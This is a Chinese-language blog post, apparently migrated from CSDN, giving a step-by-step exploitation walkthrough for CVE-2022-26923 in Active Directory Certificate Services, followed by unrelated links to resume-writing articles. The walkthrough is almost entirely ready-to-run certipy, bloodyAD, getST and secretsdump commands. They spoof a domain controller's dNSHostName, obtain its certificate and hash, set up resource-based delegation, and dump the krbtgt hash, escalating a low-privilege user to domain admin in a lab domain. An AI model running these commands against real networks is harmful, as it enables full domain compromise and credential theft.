ADCS攻击之CVE-2022–26923
创始人
2024-05-29 12:20:49
0

CSDN自动博客文章迁移

漏洞简介

该漏洞允许低权限用户在安装了 Active Directory 证书服务 (AD CS) 服务器角色的默认 Active Directory 环境中将权限提升到域管理员。在默认安装的ADCS里就启用了Machine模板。

漏洞利用

添加机器账户,并将该机器账户dnsHostName指向DC[MAQ默认为10]:

certipy account create -u zhang@attack.cn -p 321.com -dc-ip 192.168.11.11 -user hacker -pass win@123456 -dns 'dc.attack.cn'

用该机器账户向ADCS请求证书:

# TARGET为ADCS机器IP

certipy req -u 'hacker$'@attack.cn -p win@123456 -target 192.168.11.12 -ca ATTACK-ADCS-CA -template Machine

用申请的证书请求DC$的TGT:

certipy auth -pfx dc.pfx -dc-ip 192.168.11.11

用DC$的nthash去DCSync:

secretsdump.py attack.cn/'dc$'@192.168.11.11 -just-dc-user attack/krbtgt -hashes :8ddb967e3951a2601d76e489373bbd0e

使用bloodyAD 攻击

# 查询MAQ的属性

python bloodyAD.py -d attack.cn -u test -p pass123 --host 192.168.11.11 getObjectAttributes 'DC=attack,DC=cn' ms-DS-MachineAccountQuota

python bloodyAD.py -d attack.cn -u test -p pass123 --host 192.168.11.11 getObjectAttributes 'DC=attack,DC=cn' ms-DS-MachineAccountQuota

# 新增计算机账号

python bloodyAD.py -d attack.cn -u test -p pass123 --host 192.168.11.11 addComputer creme pass123

# 设置新增的机器账号的属性DNSHostName指向AD的属性值

python bloodyAD.py -d attack.cn -u test -p pass123 --host 192.168.11.11 setAttribute 'CN=cremem,CN=Computers,DC=attack,DC=cn' dNSHostName '["dc.attack.cn"]'

# 查看dNSHostName属性的指向

python bloodyAD.py -d attack.cn -u test -p pass123 --host 192.168.11.11 getObjectAttributes 'DC=attack,DC=cn' dNSHostName

# 运行Certipy生成机器证书,可以看到DNSHostName 已经变成了dc.attack.cn

certipy req 'attack.cn/cremem$:pass123@dc.attack.cn' -ca ATTACK-ADCS-CA -template Machine

# 用申请的证书请求DC$的TGT

certipy auth -pfx dc.pfx -dc-ip 192.168.11.11

# 用DC$的nthash去DCSync

secretsdump.py attack.cn/'dc$'@192.168.11.11 -just-dc-user attack/krbtgt -hashes :8ddb967e3951a2601d76e489373bbd0e

如果使用certipy请求TGT失败,还可以设置RBCD来攻击:

openssl pkcs12 -in dc.pfx -out dc.pem -nodes

python3 bloodyAD.py -c ':dc.pem' -u 'win$' --host 192.168.11.11 setRbcd 'hacker$' 'dc$'

getST.py attack.cn/'hacker$':'win@123456' -spn LDAP/dc.attack.cn -impersonate administrator -dc-ip 192.168.11.11

export KRB5CCNAME=administrator.ccache

secretsdump.py -k dc.attack.cn -just-dc-user attack/krbtgt

转载请注明:Adminxe's Blog » ADCS攻击之CVE-2022–26923

相关内容

热门资讯

hr面试技巧和话术(2)   一、打电话前的准备工作:  1、对企业的招聘信息进行包装。应聘者在得到电话通知后,一般会再查看自...
医生专业个人简历 医生专业个人简历模板姓 名:XXXX性 别:男照片婚姻状况:已婚出生年月:1970年10月民 族:汉...
学校勤工俭学大学生简历 学校勤工俭学大学生简历模板  作为一名大学生,我们刚刚出道社会没有工作经验,那么我们应该怎么做好一份...
个人简历表格范文 下面是CN人才网小编整理的一份个人简历表格范文,一起来看看吧。 姓名 性别 出生年月 民族 ...
个人简历空白表格下载word... 姓名 性别 出生年月 民族 政治面貌 身高 学制 学历 户籍 专业 毕业学校 ...
小升初简历自我介绍 小升初简历自我介绍范文  参加小升初的同学们知道怎么作自我介绍才算优秀吗?一份出色的小升初面试自我介...
个人求职简历表 个人求职简历表范文  有些求职者的个人简历每次投递出去都没有回应,其原因就是打造的个人简历没有针对性...
邮件求职简历 邮件求职简历模板(精选6篇)  光阴的迅速,一眨眼就过去了,眼见着,找工作的时间马上到来,是时候好好...
会计应聘自我介绍三分钟 会计应聘自我介绍三分钟【9篇】  想要获得一份心仪的工作,除了有一份精美的简历,还需要有一个流利独特...
助理工程师简历范文   基本信息  姓 名: 中国人才网  性 别: 男  年 龄: 24岁  最高学历: 本科  工作...
简历设计比赛的策划书 简历设计比赛的策划书范文(精选6篇)  伴着时间的流逝,辛苦的工作已经告一段落,我们又将开启新一轮的...
关于性格介绍的英语单词和短语   在国际化的今天,很多企业,尤其是外企以及有对外业务的企业,都会要求应聘者提供一份英文简历或者面试...
简历中求职意向怎么写   对于职场人士来说,他们已经工作了一段时间,对于自己的了解比较深,对于某些行业的也有一定的了解,因...
应届毕业实习生简历 应届毕业实习生简历范文姓名:目前所在:天河区年龄:21户口所在:汕头国籍:中国婚姻状况:未婚民族:汉...
简历中的工作描述怎么写   简历工作描述怎么写?首先我们必须掌握工作描述的基本架构。  1.工作目标:  是指工作的最终目标...
参赛歌手个人简介 参赛歌手个人简介范文  一个自信的性格,一个放松的状态,以及一种让人亲近的感觉,是面试成功的基础。以...
中专护士个人简历模板(2)   执业证书 有执照  现有职称 护士  政治面貌 团员 实习医院 广州市经济开发区医院  应聘职位...
幼儿教师个人简历的自我评价 实用幼儿教师个人简历的自我评价50字  在平平淡淡的日常中,我们使用到自我评价的地方非常多,自我评价...
SEO的职业规划 SEO的职业规划  SEO的未来在哪里?如何进行SEO的职业规划,其实小编也正为此事烦恼,所以查阅了...
求职简历格式与 求职简历格式与范本  制作简历也是大有学问的,一封好的邮件简历就是一个好的成功开始!下面为您整理了两...